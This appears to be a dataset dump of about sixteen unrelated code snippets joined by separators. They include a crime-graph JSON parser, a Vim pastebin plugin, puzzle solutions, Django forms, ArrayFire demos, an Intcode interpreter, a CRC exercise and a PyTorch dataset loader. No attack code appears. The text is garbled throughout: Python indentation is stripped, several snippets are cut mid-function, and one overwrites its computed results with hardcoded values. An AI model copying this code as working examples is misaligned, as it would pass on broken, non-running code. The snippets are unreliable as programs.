sys.exit(2)
disp_node = False
shownodes = False
infile = ''
name = ''
for k, v in opts:
if k == '-n':
disp_node = True
if k == '-f':
infile = v
if k == '-o':
shownodes = True
if k == '-m':
name = v
if k == '-h':
print('please specify -f <location file> -m <name of guys> these are the most compulsory and important params')
sys.exit()
#############################
dt = {}
n = 1
while True:
try:
file = infile + 'main' + str(n) + '.json'
with open(file) as f:
data = json.load(f)
nonodes = len(data['nodes'])
nolinks = len(data['links'])
if disp_node:
print(nonodes)
print(nolinks)
for x in range(0, nonodes):
if data['nodes'][x]['type'] == "Crime/CrimeID":
crmid = data['nodes'][x]['properties']['value']
origin = ''
connected = ''
nodesconnected = list()
for x in range(0, nolinks):
idcur = data['links'][x][1]
idtarg = data['links'][x][3]
for y in range(0, nonodes):
if data['nodes'][y]['id'] == idcur:
origin = checkinexclusion(data['nodes'][y]['type'])
if data['nodes'][y]['id'] == idtarg:
connected = checkinexclusion(data['nodes'][y]['type'])
nodesconnected.append(origin)
nodesconnected.append(connected)
#if shownodes : print('[' +str(origin)+','+str(connected)+']['+str(data['links'][x][2])+','+str(data['links'][x][4])+']')
nodesconnected = list(set(list(filter(None, nodesconnected))))
crmout = {'crmid': crmid, 'name': name, 'nodesall': nodesconnected, 'nonodes': len(nodesconnected), 'nolinks': nolinks}
print(crmout)
###########################################
nodesconnected = ['Mood/Alcoholic', 'Activity/Driving']
data['CrimeID'] = n
for i in nodesconnected:
val = i.split("/")
if val[0] in dt.keys():
dt[val[0]].append([val[1]])
else:
dt[val[0]] = [val[1]]
n += 1
except:
break
print(dt)
df = pd.DataFrame.from_dict(dt, orient='columns')
print(df.head())
df.to_csv('Clustering_NodeData/temp_data.csv', header=True, index=False)
###################################################
|
def hpaste():
import vim, sys, urllib, urllib2
enc = vim.eval('&fileencoding') or vim.eval('&encoding')
code = vim.eval('l:code').decode(enc, 'ignore').encode('utf-8')
title = vim.eval('input("Title: ")')
if not title:
print 'aborted'
return
author = vim.eval('s:GetHPasteAuthor()')
language = vim.eval('&filetype')
channel = vim.eval('input("Channel: ")')
data = urllib.urlencode({
'title' : title,
'author' : author,
'language' : language,
'channel' : channel,
'paste' : code,
'email' : ''
})
try:
res = urllib2.urlopen('http://lpaste.net/new', data)
paste = res.geturl()
print 'Created new paste %s' % paste
vim.command('call setreg("+", %r)' % paste)
finally:
res.close()
|
n = int(input())
plist = []
for _ in range(n):
p = int(input())
plist.append(p)
print(sum(plist) - max(plist)//2)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
fig, ax = plt.subplots()
xdata, ydata, xmydata, ymydata = [], [], [], []
ln1, = ax.plot([], [], 'b-')
ln2, = ax.plot([], [], 'r-')
data_spain_ccaa = pd.read_csv('/Users/alejandrosusillo/Downloads/serie_historica_acumulados.csv', sep=',')
data_spain_ccaa = data_spain_ccaa.drop(len(data_spain_ccaa) - 1)
data_spain_ccaa['Casos '] = data_spain_ccaa['Casos '].fillna(0)
data_spain_ccaa['Fallecidos'] = data_spain_ccaa['Fallecidos'].fillna(0)
data_MD = data_spain_ccaa[data_spain_ccaa['CCAA Codigo ISO'].isin(['MD'])][['Casos ', 'Fallecidos']].to_numpy().transpose().astype(int)
data_AN = data_spain_ccaa[data_spain_ccaa['CCAA Codigo ISO'].isin(['CT'])][['Casos ', 'Fallecidos']].to_numpy().transpose().astype(int)
# GET HEADERS FROM UI, X AND Y. GET THE MAXIMUM VALUE AMONG ALL THE GIVEN HEADERS. CREATE UNA LINE FOR EACH HEADER.
def init():
ax.set_xlim(0, 15000)
ax.set_ylim(0, 2000)
return ln1,ln2,
def update(num, data_MD, data_AN, line1, line2):
line1.set_data(data_MD[..., :num])
line2.set_data(data_AN[..., :num])
return ln1,ln2,
#Writer = animation.writers['ffmpeg']
#writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)
ani = FuncAnimation(fig, update, 50, fargs=(data_MD, data_AN, ln1, ln2), interval=100, init_func=init, blit=True)
test = ani.to_html5_video()
test2 = print(ani.to_html5_video())
#test = ani.save('lines.mp4', writer=writer)
plt.show()
|
#!/usr/bin/python
def displayPathtoPrincess(n,grid):
botp = [-1, -1]
prinp = [-1, -1]
for x in range(0, n):
for y in range(0, n):
z = grid[x][y]
if z == 'm':
botp[0] = x
botp[1] = y
if z == 'p':
prinp[0] = x
prinp[1] = y
#print("botp:", botp[0], botp[1])
#print("prinp:", prinp[0], prinp[1])
disp = [prinp[0]-botp[0], prinp[1]-botp[1]]
#print("disp:", disp[0], disp[1])
if disp[0] > 0:
for x in range(0, disp[0]):
print("DOWN")
elif disp[0] < 0:
for x in range(disp[0], 0):
print("UP")
if disp[1] > 0:
for x in range(0, disp[1]):
print("RIGHT")
elif disp[1] < 0:
for x in range(disp[1], 0):
print("LEFT")
#m = int(input())
#grid = []
#for i in range(0, m):
# grid.append(input().strip())
grid = []
m=3
grid.append("---")
grid.append("-m-")
grid.append("p--")
displayPathtoPrincess(m,grid)
|
# Copyright 2015, Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import unittest
from pinball_ext.executor import cluster_executor
__author__ = 'Changshu Liu'
__copyright__ = 'Copyright 2015, Pinterest, Inc.'
__credits__ = [__author__]
__license__ = 'Apache'
__version__ = '2.0'
class ClusterExecutorTest(unittest.TestCase):
def test_creation(self):
user_jar_dirs = ['/dir1/jar1/', '/dir2/jar2/']
user_app_jar = '/dir/jar.jar'
user_archive = '/dir/file.archive'
platform = 'local'
executor = cluster_executor.ClusterExecutor(
executor_config={
'USER_LIBJAR_DIRS': ','.join(user_jar_dirs),
'USER_APPJAR_PATH': user_app_jar,
'USER_ARCHIVE_PATH': user_archive,
'PLATFORM': platform,
'USER': 'test_user'
}
)
self.assertEqual(executor.config.USER_LIBJAR_DIRS, user_jar_dirs)
self.assertEqual(executor.config.USER_APPJAR_PATH, user_app_jar)
self.assertEqual(executor.config.USER_ARCHIVE_PATH, user_archive)
self.assertEqual(executor.config.PLATFORM, platform)
|
from django import forms
from django.forms import ModelForm
from .models import Profile
from django.contrib.auth.models import User
class CreateUserForm(forms.Form):
Username = forms.CharField(max_length=20, label='Nombre de Usuario:')
Password = forms.CharField(max_length=10, label='Password: ', widget=forms.PasswordInput)
Check_Password = forms.CharField(max_length=10, label='Confirmar password: ', widget=forms.PasswordInput)
Email = forms.EmailField(label='E-mail: ')
First_name = forms.CharField(max_length=60, label='Nombre: ')
Last_name = forms.CharField(max_length=80, label='Apellido: ')
class LoginUserForm(forms.Form):
Username = forms.CharField(max_length=20, label='Nombre de Usuario: ')
Password = forms.CharField(max_length=10, label='Password: ', widget=forms.PasswordInput)
class PerfilForm(ModelForm):
def __init__(self, user, *args, **kwargs):
super (PerfilForm, self).__init__(*args, **kwargs)
#self.fields['user'].queryset = User.objects.filter(username=user)
self.fields['user'].widget.attrs['value'] = User.objects.filter(username=user)[0].pk
self.fields['user'].widget.attrs['readonly'] = True
class Meta:
model = Profile
fields = '__all__'
exclude = ['imagen']
widgets = {
'user': forms.HiddenInput(),
'imagen': forms.FileInput(attrs={'accept': 'image/*', 'capture': 'camera'}),
}
labels = {
'numero': 'Numero interior: ',
'calle': 'Calle: ',
'colonia': 'Colonia: ',
'municipio': 'Municipio: ',
'estado': 'Estado :',
'ciudad': 'Ciudad: ',
'pais': 'Pais: ',
}
|
<h1>Mon titre principal</h1>
<h2>Mon titre de section</h2>
<h3>Mon sous-titre</h3>
<h4>Mon sous-sous-titre</h4> |
# project euler problem #2
# find sum of even valued fibonacci numbers
# more list comprehension go brrrrrrrrrrrrr but with more steps
# basically build a fibonacci generator then list comprehension it
def fib(n):
f1, f2 = 1, 2
# try to generate up to n + 1 since we know that the sequence will outgrow n before hitting the nth element
for _ in range(n + 1):
if f1 > n:
break
else:
yield f1
f1, f2 = f2, f1 + f2
print(sum([num for num in fib(4000000) if num % 2 == 0])) |
class Task:
def __init__(self, task, answer):
self.task = task
self.answer = answer
def get_task(self):
return "Your task is: {}".format(self.task)
def get_answer(self):
return "The correct answer is: {}".format(self.answer)
|
#!/usr/bin/python
#######################################################
# Copyright (c) 2015, ArrayFire
# All rights reserved.
#
# This file is distributed under 3-clause BSD license.
# The complete license agreement can be obtained at:
# http://arrayfire.com/licenses/BSD-3-Clause
########################################################
import arrayfire as af
a = af.randu(10, 1)
pos0 = af.randu(10) * 10
af.display(af.approx1(a, pos0))
a = af.randu(3, 3)
pos0 = af.randu(3, 3) * 10
pos1 = af.randu(3, 3) * 10
af.display(af.approx2(a, pos0, pos1))
a = af.randu(8, 1)
af.display(a)
af.display(af.fft(a))
af.display(af.dft(a))
af.display(af.real(af.ifft(af.fft(a))))
af.display(af.real(af.idft(af.dft(a))))
a = af.randu(4, 4)
af.display(a)
af.display(af.fft2(a))
af.display(af.dft(a))
af.display(af.real(af.ifft2(af.fft2(a))))
af.display(af.real(af.idft(af.dft(a))))
a = af.randu(4, 4, 2)
af.display(a)
af.display(af.fft3(a))
af.display(af.dft(a))
af.display(af.real(af.ifft3(af.fft3(a))))
af.display(af.real(af.idft(af.dft(a))))
a = af.randu(10, 1)
b = af.randu(3, 1)
af.display(af.convolve1(a, b))
af.display(af.fft_convolve1(a, b))
af.display(af.convolve(a, b))
af.display(af.fft_convolve(a, b))
a = af.randu(5, 5)
b = af.randu(3, 3)
af.display(af.convolve2(a, b))
af.display(af.fft_convolve2(a, b))
af.display(af.convolve(a, b))
af.display(af.fft_convolve(a, b))
a = af.randu(5, 5, 3)
b = af.randu(3, 3, 2)
af.display(af.convolve3(a, b))
af.display(af.fft_convolve3(a, b))
af.display(af.convolve(a, b))
af.display(af.fft_convolve(a, b))
b = af.randu(3, 1)
x = af.randu(10, 1)
a = af.randu(2, 1)
af.display(af.fir(b, x))
af.display(af.iir(b, a, x))
|
def inicstr(str_data):
d = {}
if len(str_data) > 0:
lst = str_data.split('/')
if len(lst) > 3:
|
def getModeForParam(pos, data, ins):
if pos == 1:
return (data[ins] % 1000) // 100 is 1
if pos == 2:
return data[ins] // 1000 is 1
def getParamByMode(pos, data, ins):
if getModeForParam(pos, data, ins):
return data[ins + pos]
else:
return data[data[ins + pos]]
def setValueAtPos(data, pos, val):
data[data[pos]] = val
inp = input()
data = [int(x) for x in inp.split(',')]
inVal = 5
ins = 0
while data[ins] % 100 != 99:
opcode = data[ins] % 100
if opcode == 1:
# add
p1 = getParamByMode(1, data, ins)
p2 = getParamByMode(2, data, ins)
setValueAtPos(data, ins + 3, p1 + p2)
ins += 4
elif opcode == 2:
# mul
p1 = getParamByMode(1, data, ins)
p2 = getParamByMode(2, data, ins)
setValueAtPos(data, ins + 3, p1 * p2)
ins += 4
elif opcode == 3:
# input
setValueAtPos(data, ins + 1, inVal)
ins += 2
elif opcode == 4:
# output
p1 = getParamByMode(1, data, ins)
print(p1)
ins += 2
elif opcode == 5:
# jump-if-true
p1 = getParamByMode(1, data, ins)
p2 = getParamByMode(2, data, ins)
if p1:
ins = p2
else:
ins += 3
elif opcode == 6:
# jump-if-false
p1 = getParamByMode(1, data, ins)
p2 = getParamByMode(2, data, ins)
if not p1:
ins = p2
else:
ins += 3
elif opcode == 7:
# less than
p1 = getParamByMode(1, data, ins)
p2 = getParamByMode(2, data, ins)
setValueAtPos(data, ins + 3, 1 if p1 < p2 else 0)
ins += 4
elif opcode == 8:
# equals
p1 = getParamByMode(1, data, ins)
p2 = getParamByMode(2, data, ins)
setValueAtPos(data, ins + 3, 1 if p1 == p2 else 0)
ins += 4
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-31 05:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rcapp', '0006_recordings_device'),
]
operations = [
migrations.CreateModel(
name='UserInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gender', models.CharField(default='unknown', max_length=7)),
('age', models.CharField(default='unknown', max_length=7)),
],
),
]
|
def findOne(strrr):
return strrr.index('1')
def checkRemainder(inputString, divisor):
global flag
crcAdded = list(inputString)
# crcAdded = crcAdded + list('0'*(len(crc_32)-1))
lenInput = len(inputString)
lenDivisor = len(divisor)
while '1' in crcAdded[:lenInput]:
latestOne = findOne(crcAdded)
for i in range(0, lenDivisor):
if (divisor[i] == crcAdded[latestOne + i]):
crcAdded[latestOne + i] = '0'
else:
crcAdded[latestOne + i] = '1'
heyhey = ''.join(crcAdded)[lenInput:]
print("Remainder: ", heyhey)
for i in range(0, len(heyhey)):
if(heyhey[i]=='1'):
return '1'
return '0'
def remainder(inputString, divisor):
crcAdded = list(inputString)
crcAdded = crcAdded + list('0'*3)
lenInput = len(inputString)
lenDivisor = len(divisor)
while '1' in crcAdded[:lenInput]:
latestOne = findOne(crcAdded)
for i in range(0, lenDivisor):
if (divisor[i] == crcAdded[latestOne + i]):
crcAdded[latestOne + i] = '0'
else:
crcAdded[latestOne + i] = '1'
heyhey = ''.join(crcAdded)[lenInput:]
return heyhey
print(remainder("01101000","1011"))
print(checkRemainder("0110100001100101011011000110110001101111011","1011"))
# unstuffedOutput = stuffedOutput.replace('01111110', '')
# unstuffedOutput = stuffedOutput.replace('111110','11111')
# for i in range(0, len(unstuffedOutput), 400)):
# truth = checkRemainder(unstuffedOutput[i:i+400],crc_32)
# print(unstuffedOutput[i:i+400])
# print(truth)
# this is my rough work thing. the crc remainder for this input should have been 100. But i am getting 111. Chec |
import os
import numpy as np
import torch
from torch.utils.data.dataset import Subset
from torchvision import datasets, transforms
import json
from utils.utils import set_random_seed
DATA_PATH = '~/data/'
IMAGENET_PATH = '~/data/ImageNet'
CIFAR10_SUPERCLASS = list(range(10)) # one class
IMAGENET_SUPERCLASS = list(range(30)) # one class
CIFAR100_SUPERCLASS = [
[4, 31, 55, 72, 95],
[1, 33, 67, 73, 91],
[54, 62, 70, 82, 92],
[9, 10, 16, 29, 61],
[0, 51, 53, 57, 83],
[22, 25, 40, 86, 87],
[5, 20, 26, 84, 94],
[6, 7, 14, 18, 24],
[3, 42, 43, 88, 97],
[12, 17, 38, 68, 76],
[23, 34, 49, 60, 71],
[15, 19, 21, 32, 39],
[35, 63, 64, 66, 75],
[27, 45, 77, 79, 99],
[2, 11, 36, 46, 98],
[28, 30, 44, 78, 93],
[37, 50, 65, 74, 80],
[47, 52, 56, 59, 96],
[8, 13, 48, 58, 90],
[41, 69, 81, 85, 89],
]
class MultiDataTransform(object):
def __init__(self, transform):
self.transform1 = transform
self.transform2 = transform
def __call__(self, sample):
x1 = self.transform1(sample)
x2 = self.transform2(sample)
return x1, x2
class MultiDataTransformList(object):
def __init__(self, transform, clean_trasform, sample_num):
self.transform = transform
self.clean_transform = clean_trasform
self.sample_num = sample_num
def __call__(self, sample):
set_random_seed(0)
sample_list = []
for i in range(self.sample_num):
sample_list.append(self.transform(sample))
return sample_list, self.clean_transform(sample)
def get_transform(image_size=None):
# Note: data augmentation is implemented in the layers
# Hence, we only define the identity transformation here
if image_size: # use pre-specified image size
train_transform = transforms.Compose([
transforms.Resize((image_size[0], image_size[1])),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
test_transform = transforms.Compose([
transforms.Resize((image_size[0], image_size[1])),
transforms.ToTensor(),
])
else: # use default image size
train_transform = transforms.Compose([
transforms.ToTensor(),
])
test_transform = transforms.ToTensor()
return train_transform, test_transform
def get_subset_with_len(dataset, length, shuffle=False):
set_random_seed(0)
dataset_size = len(dataset)
index = np.arange(dataset_size)
if shuffle:
np.random.shuffle(index)
index = torch.from_numpy(index[0:length])
subset = Subset(dataset, index)
assert len(subset) == length
return subset
def get_transform_imagenet():
train_transform = transforms.Compose([
transforms.Resize(256),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
test_transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
])
train_transform = MultiDataTransform(train_transform)
return train_transform, test_transform
def get_dataset(P, dataset, test_only=False, image_size=None, download=False, eval=False):
if dataset in ['imagenet', 'cub', 'stanford_dogs', 'flowers102',
'places365', 'food_101', 'caltech_256', 'dtd', 'pets']:
if eval:
train_transform, test_transform = get_simclr_eval_transform_imagenet(P.ood_samples,
P.resize_factor, P.resize_fix)
else:
train_transform, test_transform = get_transform_imagenet()
else:
train_transform, test_transform = get_transform(image_size=image_size)
if dataset == 'cifar10':
image_size = (32, 32, 3)
n_classes = 10
train_set = datasets.CIFAR10(DATA_PATH, train=True, download=download, transform=train_transform)
test_set = datasets.CIFAR10(DATA_PATH, train=False, download=download, transform=test_transform)
elif dataset == 'cifar100':
image_size = (32, 32, 3)
n_classes = 100
train_set = datasets.CIFAR100(DATA_PATH, train=True, download=download, transform=train_transform)
test_set = datasets.CIFAR100(DATA_PATH, train=False, download=download, transform=test_transform)
elif dataset == 'svhn':
assert test_only and image_size is not None
test_set = datasets.SVHN(DATA_PATH, split='test', download=download, transform=test_transform)
elif dataset == 'lsun_resize':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'LSUN_resize')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
elif dataset == 'lsun_fix':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'LSUN_fix')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
elif dataset == 'imagenet_resize':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'Imagenet_resize')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
elif dataset == 'imagenet_fix':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'Imagenet_fix')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
elif dataset == 'imagenet':
image_size = (224, 224, 3)
n_classes = 30
train_dir = os.path.join(IMAGENET_PATH, 'one_class_train')
test_dir = os.path.join(IMAGENET_PATH, 'one_class_test')
train_set = datasets.ImageFolder(train_dir, transform=train_transform)
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
elif dataset == 'stanford_dogs':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'stanford_dogs')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
elif dataset == 'cub':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'cub200')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
elif dataset == 'flowers102':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'flowers102')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
elif dataset == 'places365':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'places365')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
elif dataset == 'food_101':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'food-101', 'images')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
elif dataset == 'caltech_256':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'caltech-256')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
elif dataset == 'dtd':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'dtd', 'images')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
elif dataset == 'pets':
assert test_only and image_size is not None
test_dir = os.path.join(DATA_PATH, 'pets')
test_set = datasets.ImageFolder(test_dir, transform=test_transform)
test_set = get_subset_with_len(test_set, length=3000, shuffle=True)
else:
raise NotImplementedError()
if test_only:
return test_set
else:
return train_set, test_set, image_size, n_classes
def get_superclass_list(dataset):
if dataset == 'cifar10':
return CIFAR10_SUPERCLASS
elif dataset == 'cifar100':
return CIFAR100_SUPERCLASS
elif dataset == 'imagenet':
return IMAGENET_SUPERCLASS
else:
raise NotImplementedError()
def get_subclass_dataset(dataset, classes):
if not isinstance(classes, list):
classes = [classes]
indices = []
for idx, tgt in enumerate(dataset.targets):
if tgt in classes:
indices.append(idx)
dataset = Subset(dataset, indices)
return dataset
def get_subclass_contaminated_dataset(dataset, normal_classes, known_outlier_classes, ratio_known_normal, ratio_known_outlier, ratio_pollution):
outlier_classes = list(set(dataset.targets))
for normal_cls in normal_classes:
outlier_classes.remove(normal_cls)
idx_normal = np.argwhere(np.isin(dataset.targets, normal_classes)).flatten()
idx_outlier = np.argwhere(np.isin(dataset.targets, outlier_classes)).flatten()
idx_known_outlier_candidates = np.argwhere(np.isin(dataset.targets, known_outlier_classes)).flatten()
n_normal = len(idx_normal)
# Solve system of linear equations to obtain respective number of samples
a = np.array([[1, 1, 0, 0],
[(1-ratio_known_normal), -ratio_known_normal, -ratio_known_normal, -ratio_known_normal],
[-ratio_known_outlier, -ratio_known_outlier, -ratio_known_outlier, (1-ratio_known_outlier)],
[0, -ratio_pollution, (1-ratio_pollution), 0]])
b = np.array([n_normal, 0, 0, 0])
x = np.linalg.solve(a, b)
# Get number of samples
n_known_normal = int(x[0])
n_unlabeled_normal = int(x[1])
n_unlabeled_outlier = int(x[2])
n_known_outlier = int(x[3])
print("# of known normal: ", n_known_normal)
print("# of known outlier: ", n_known_outlier)
# Sample indices
perm_normal = np.random.permutation(n_normal)
perm_outlier = np.random.permutation(len(idx_outlier))
perm_known_outlier = np.random.permutation(len(idx_known_outlier_candidates))
idx_known_normal = idx_normal[perm_normal[:n_known_normal]].tolist()
idx_unlabeled_normal = idx_normal[perm_normal[n_known_normal:n_known_normal+n_unlabeled_normal]].tolist()
idx_unlabeled_outlier = idx_outlier[perm_outlier[:n_unlabeled_outlier]].tolist()
idx_known_outlier = idx_known_outlier_candidates[perm_known_outlier[:n_known_outlier]].tolist()
# Get original class labels
labels_known_normal = np.array(dataset.targets)[idx_known_normal].tolist()
labels_unlabeled_normal = np.array(dataset.targets)[idx_unlabeled_normal].tolist()
labels_unlabeled_outlier = np.array(dataset.targets)[idx_unlabeled_outlier].tolist()
labels_known_outlier = np.array(dataset.targets)[idx_known_outlier].tolist()
# Get semi-supervised setting labels
semi_labels_known_normal = np.ones(n_known_normal).astype(np.int32).tolist()
semi_labels_unlabeled_normal = np.zeros(n_unlabeled_normal).astype(np.int32).tolist()
semi_labels_unlabeled_outlier = np.zeros(n_unlabeled_outlier).astype(np.int32).tolist()
semi_labels_known_outlier = (-np.ones(n_known_outlier).astype(np.int32)).tolist()
# Create final lists
list_idx = idx_known_normal + idx_unlabeled_normal + idx_unlabeled_outlier + idx_known_outlier
list_labels = labels_known_normal + labels_unlabeled_normal + labels_unlabeled_outlier + labels_known_outlier
list_semi_labels = (semi_labels_known_normal + semi_labels_unlabeled_normal + semi_labels_unlabeled_outlier
+ semi_labels_known_outlier)
print("# of training set: ", len(list_idx))
dataset = Subset(dataset, list_idx)
dataset.targets = list_semi_labels
return dataset
def get_simclr_eval_transform_imagenet(sample_num, resize_factor, resize_fix):
resize_scale = (resize_factor, 1.0) # resize scaling factor
if resize_fix: # if resize_fix is True, use same scale
resize_scale = (resize_factor, resize_factor)
transform = transforms.Compose([
transforms.Resize(256),
transforms.RandomResizedCrop(224, scale=resize_scale),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
clean_trasform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
])
transform = MultiDataTransformList(transform, clean_trasform, sample_num)
return transform, transform
|
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 1 09:43:17 2017
@author: casari
"""
master_params_1_0_0 = [{'name': 'System','type':'str','value':'MASTER'},
{'name':'PMEL Serial Number','type':'str','value':'XXXXXXXXXX'},
{'name':'Firmware Version','type':'str','value':'XXXXXXXXXX'}]
com_params_1_0_0 = [ {'name':'Name','type':'str','value':'NAME'},
{'name':'Prefix','type':'str','value':'PREFIX'},
{'name':'Serial Port','type':'str','value':'XXXX'},
{'name':'Baud Rate','type':'list','values':['1200','2400','4800','9600','19200','28800','57600','115200'],'value':'9600'},
{'name':'Warmup Time','type':'int','value':12000},
{'name':'Sample Start Time','type':'str','value':'00:00:00'},
{'name':'Sample Interval','type':'str','value':'00:00:00'},
{'name':'Sample Period','type':'str','value':'00:00:00'},
{'name':'Sample Rate','type':'int','value':1},
{'name':'Power Switch','type':'int','value':1},
{'name':'Command','type':'str','value':'0'},
{'name':'cmd','type':'str','value':""},
{'name':'header','type':'str','value':'$'},
{'name':'format','type':'str','value':''},
{'name':'column[0]','type':'str','value':''},
{'name':'column[1]','type':'str','value':''},
{'name':'column[2]','type':'str','value':''},
{'name':'column[3]','type':'str','value':''},
{'name':'column[4]','type':'str','value':''},
{'name':'column[5]','type':'str','value':''},
{'name':'column[6]','type':'str','value':''},
{'name':'column[7]','type':'str','value':''},
{'name':'=end'} ]
com_params_0_0_1 = [ {'name':'Name','type':'str','value':'NAME'},
{'name':'Prefix','type':'str','value':'PREFIX'},
{'name':'Serial Port','type':'str','value':'XXXX'},
{'name':'Baud Rate','type':'list','values':['1200','2400','4800','9600','19200','28800','57600','115200'],'value':'9600'},
{'name':'Warmup Time','type':'int','value':12000},
{'name':'Sample Start Time','type':'str','value':'00:00:00'},
{'name':'Sample Interval','type':'str','value':'00:00:00'},
{'name':'Sample Period','type':'str','value':'00:00:00'},
{'name':'Sample Rate','type':'int','value':1},
{'name':'Power Switch','type':'int','value':1},
{'name':'Command','type':'str','value':'0'},
{'name':'cmd','type':'str','value':""},
{'name':'header','type':'str','value':'$'},
{'name':'format','type':'str','value':''},
{'name':'=end'} ] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.